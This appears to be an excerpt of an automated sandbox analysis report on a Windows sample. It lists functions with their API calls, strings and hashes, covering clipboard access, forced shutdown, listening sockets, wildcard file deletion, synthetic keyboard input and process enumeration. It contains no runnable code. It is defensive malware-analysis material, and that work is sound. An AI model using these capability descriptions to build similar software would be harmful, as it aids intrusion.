\*.*, xrefs: 0018D0CD, 0018D0D6, 0018D0EB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 5c4faa56fb90cfb3f1d79e9ab013f723b64d7b7cea01e4b2a0545c1f8dff06db
Instruction ID: 6b4ec1aa91152fbf1edbb8d2dd16d390a8221f7592c5b609acd82248215f2b37
Opcode Fuzzy Hash: 5c4faa56fb90cfb3f1d79e9ab013f723b64d7b7cea01e4b2a0545c1f8dff06db
Instruction Fuzzy Hash: 6D61493180121DAFCF05FBA4EA929EDB7B6AF65300F644165E402B7191EB30AF59CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0019ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0019ED91
EmptyClipboard.USER32 ref: 0019ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0019EDAC
CloseClipboard.USER32 ref: 0019EEA3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0a10cf2470250a767306b99e42ea477aea5fc232ac19351a80e27dc71f02d603
Instruction ID: d946cfb1706b4e158f48adf80b00137119e1a89e44846fab5b9b0f318396c487
Opcode Fuzzy Hash: 0a10cf2470250a767306b99e42ea477aea5fc232ac19351a80e27dc71f02d603
Instruction Fuzzy Hash: CC415B35604611AFEB20DF55E888F1ABBE5FF44328F158599E4158BB62C735EC81CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0018E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 001816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
Part of subcall function 001816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
Part of subcall function 001816C3: GetLastError.KERNEL32 ref: 0018174A

ExitWindowsEx.USER32(?,00000000), ref: 0018E932

Strings

SeShutdownPrivilege, xrefs: 0018E902
, xrefs: 0018E920
@, xrefs: 0018E925
, xrefs: 0018E95C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9cfcfae88890e16b5c0988c4aa3182920207038e838504b68f5d6f34fa29e0f0
Instruction ID: f99c724e26c53a38b51f526eec161d91121b8b5768a175927c59ac430f169c67
Opcode Fuzzy Hash: 9cfcfae88890e16b5c0988c4aa3182920207038e838504b68f5d6f34fa29e0f0
Instruction Fuzzy Hash: 8E01D673E10211ABEB6436B49C86FBF729CA714758F154521F812E21E2D7E09E808FE0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 001A1276
WSAGetLastError.WSOCK32 ref: 001A1283
bind.WSOCK32(00000000,?,00000010), ref: 001A12BA
WSAGetLastError.WSOCK32 ref: 001A12C5
closesocket.WSOCK32(00000000), ref: 001A12F4
listen.WSOCK32(00000000,00000005), ref: 001A1303
WSAGetLastError.WSOCK32 ref: 001A130D
closesocket.WSOCK32(00000000), ref: 001A133C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: ab1cfcc2c343dc4e14a9a4601df8a35609227dee8f0e09134949ec193d3de320
Instruction ID: 6659c66db9e4f4d066d2f8c2d8a2adf450ce006f5f28a488c14acbdc681911fd
Opcode Fuzzy Hash: ab1cfcc2c343dc4e14a9a4601df8a35609227dee8f0e09134949ec193d3de320
Instruction Fuzzy Hash: 4B419535600110AFD710DF64D584B69BBE6BF86328F288199E8569F3D2C771ED81CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0018D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2

Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A

FindFirstFileW.KERNEL32(?,?), ref: 0018D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0018D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0018D481
FindClose.KERNEL32(00000000), ref: 0018D498
FindClose.KERNEL32(00000000), ref: 0018D4A1

Strings

\*.*, xrefs: 0018D3F2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 7acf0a2700268d4196971ebdca11149c006353592599e7d65a93a43fbc05e49b
Instruction ID: 746af29eacf8953fb7ff7323f0d41ebe82f9ffa3f649dd8e6ef57548df21c912
Opcode Fuzzy Hash: 7acf0a2700268d4196971ebdca11149c006353592599e7d65a93a43fbc05e49b
Instruction Fuzzy Hash: 38314B710083559FC704FF64E8918AFB7A8BFA5314F844A2DF4D592191EB30AA19CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0015E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0015E645

Strings

1#IND, xrefs: 0015F83D
1#SNAN, xrefs: 0015F844
1#INF, xrefs: 0015F852
1#QNAN, xrefs: 0015F84B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4fb429846015856b474e1e23e4e97abae43d93bc7a465b73248894d0bdace243
Instruction ID: 746f160832940876d9737a91c4402f7aec83508a3dc949c787fa725234e74470
Opcode Fuzzy Hash: 4fb429846015856b474e1e23e4e97abae43d93bc7a465b73248894d0bdace243
Instruction Fuzzy Hash: CEC23D71E04628CFDB29CE28DD407EAB7B5EB48306F1541EAD85DEB241E774AE858F40

Uniqueness

Uniqueness Score: -1.00%

Function 0019648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001964DC
CoInitialize.OLE32(00000000), ref: 00196639
CoCreateInstance.OLE32(001BFCF8,00000000,00000001,001BFB68,?), ref: 00196650
CoUninitialize.OLE32 ref: 001968D4

Strings

.lnk, xrefs: 001964BA, 00196524, 001965E0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 5918aa25a7faecbc52a3e36c65c7b73bd38ff12164d2a360e22f5d130e10dfda
Instruction ID: 881b31be3d3c64fb674df975eb8752586d48392fe3691d27b1c75d9ca6fd8371
Opcode Fuzzy Hash: 5918aa25a7faecbc52a3e36c65c7b73bd38ff12164d2a360e22f5d130e10dfda
Instruction Fuzzy Hash: ACD14871508211AFD704EF24D89196BB7E8FFA8744F00496DF5958B2A1EB70ED09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001A22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 001A22E8

Part of subcall function 0019E4EC: GetWindowRect.USER32(?,?), ref: 0019E504

GetDesktopWindow.USER32 ref: 001A2312
GetWindowRect.USER32(00000000), ref: 001A2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001A2355
GetCursorPos.USER32(?), ref: 001A2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001A23DF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: c4cac67e86a036cee5027d8aa5136ba40ac4f90d80ecca8d88b00acc0e29bff3
Instruction ID: a25e4efa840e9ba5fd923f864f2e01485308aa15243dd998f9b4cb756a988b15
Opcode Fuzzy Hash: c4cac67e86a036cee5027d8aa5136ba40ac4f90d80ecca8d88b00acc0e29bff3
Instruction Fuzzy Hash: 4831AD72504315AFDB20DF58C849A9BBBE9FF8A314F000A19F98597191DB74EA48CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00199B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00199B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00199C8B

Part of subcall function 00193874: GetInputState.USER32 ref: 001938CB
Part of subcall function 00193874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00193966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00199BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00199C75

Strings

*.*, xrefs: 00199B5D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 65804c56bac0d8e6401abfbeb9340695329c79f2e221856dbd060e95d6f0bcf8
Instruction ID: 728025c3157837b87dd225bdadf8ada34333f289b725e956cf9f3deca95575c9
Opcode Fuzzy Hash: 65804c56bac0d8e6401abfbeb9340695329c79f2e221856dbd060e95d6f0bcf8
Instruction Fuzzy Hash: 0841817190060A9FCF14DF68DC85AEEBBB8FF15310F24415AE815A6191EB30AE94CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00139A4E
GetSysColor.USER32(0000000F), ref: 00139B23
SetBkColor.GDI32(?,00000000), ref: 00139B36

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 2644b2a663bd2743040f74a7ce548ddb791c734ceefcd788239cd2040ab74c50
Instruction ID: 1bd047291e147f060d8233a30ceba1fca7d89e9d9040f44c65d6c5b3f2432429
Opcode Fuzzy Hash: 2644b2a663bd2743040f74a7ce548ddb791c734ceefcd788239cd2040ab74c50
Instruction Fuzzy Hash: D3A10771208444FFE72DAA3D8C99EBB3AADEB42344F168309F502D7AD5CBA59D41C271

Uniqueness

Uniqueness Score: -1.00%

Function 001A1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001A304E: inet_addr.WSOCK32(?), ref: 001A307A
Part of subcall function 001A304E: _wcslen.LIBCMT ref: 001A309B

socket.WSOCK32(00000002,00000002,00000011), ref: 001A185D
WSAGetLastError.WSOCK32 ref: 001A1884
bind.WSOCK32(00000000,?,00000010), ref: 001A18DB
WSAGetLastError.WSOCK32 ref: 001A18E6
closesocket.WSOCK32(00000000), ref: 001A1915

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 05b416ceb6da20f0ea9b2724b7a7004dc8787fea53bf3609569ed735ae111005
Instruction ID: 5866653ccfc8bff3e6cf72c92951e84a5017ae09ec3b061f1a1982f7d2c20cba
Opcode Fuzzy Hash: 05b416ceb6da20f0ea9b2724b7a7004dc8787fea53bf3609569ed735ae111005
Instruction Fuzzy Hash: 5B51B275A00210AFDB10AF24D886F2A77E5AB59718F04805CF909AF3C3C775AD41CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001B1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 001B1CC0
IsWindowEnabled.USER32 ref: 001B1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 001B1CDB
IsIconic.USER32 ref: 001B1CE9
IsZoomed.USER32 ref: 001B1CF7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c97739ca6ffa4890e50055a39821edafbe454314dabf5f5a0efdfc64fecb62a2
Instruction ID: 322be36db647affece77e24d76df70d671c42453dfa536be63272603bee169f8
Opcode Fuzzy Hash: c97739ca6ffa4890e50055a39821edafbe454314dabf5f5a0efdfc64fecb62a2
Instruction Fuzzy Hash: 3221D6317402116FD7208F2AC864BAA7FA5EF95314F5A8058E845CB351C771DC42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00128060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 0012843C
VUUU, xrefs: 00165DF0
VUUU, xrefs: 001283FA
ERCP, xrefs: 0012813C
VUUU, xrefs: 001283E8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 098769f4e3a1e170cbeb0cf2f5a8510ff78c68187383213d8adaed59c7bf34c1
Instruction ID: 3133302ca2aa8fc4b87679c9c95ee65656de482e6c5f969902513cb5acc8344a
Opcode Fuzzy Hash: 098769f4e3a1e170cbeb0cf2f5a8510ff78c68187383213d8adaed59c7bf34c1
Instruction Fuzzy Hash: F2A29170E0162ACBDF24CF58D8507ADB7B2BF54310F2581AAE815A7385EB749DA1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001AA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001AA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 001AA6BA

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Process32NextW.KERNEL32(00000000,?), ref: 001AA79C
CloseHandle.KERNEL32(00000000), ref: 001AA7AB

Part of subcall function 0013CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00163303,?), ref: 0013CE8A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e5fa9876f432ab9364e19954fc50d02cda536ca9ea3f26105e4668edbef4a00d
Instruction ID: 64ece234c2e4b908d85e104337d8fbb199fd360a35b6b750ddba9731d8b14448
Opcode Fuzzy Hash: e5fa9876f432ab9364e19954fc50d02cda536ca9ea3f26105e4668edbef4a00d
Instruction Fuzzy Hash: 8C516D71508310AFD710EF24D886E6BBBE8FF99754F40492DF58997292EB30D914CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0018AAAC
SetKeyboardState.USER32(00000080), ref: 0018AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0018AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0018AB88

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 985bc00b0650f22d69de82ca60fd47743c4c6669bedda878b6e879fdc3d09456
Instruction ID: 81d7c3c0e403a78bdb3671c8fdeb1c7bce703139dddf4bd962ea7d695adef840
Opcode Fuzzy Hash: 985bc00b0650f22d69de82ca60fd47743c4c6669bedda878b6e879fdc3d09456
Instruction Fuzzy Hash: 0831F630A40648AFFB35AA648C05BFA7BA6AF54310F84421BF581565D1D3759B81CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0015BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0015BB7F

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

GetTimeZoneInformation.KERNEL32 ref: 0015BB91
WideCharToMultiByte.KERNEL32(00000000,?,001F121C,000000FF,?,0000003F,?,?), ref: 0015BC09
WideCharToMultiByte.KERNEL32(00000000,?,001F1270,000000FF,?,0000003F,?,?,?,001F121C,000000FF,?,0000003F,?,?), ref: 0015BC36

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 01c36477b0483185f11ce55d8f16af7c809a5a9550a28e758692e500709981e5
Instruction ID: 883c565ececd19fb88e7b89e346f32a4eaf298d057e8c01aad05ca9922444a52
Opcode Fuzzy Hash: 01c36477b0483185f11ce55d8f16af7c809a5a9550a28e758692e500709981e5
Instruction Fuzzy Hash: E131B071908205EFCB15DFA9DC80879BBB8FF5631172442AAE874EB2B1D7309D84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0019CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0019CE89
GetLastError.KERNEL32(?,00000000), ref: 0019CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0019CEFE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
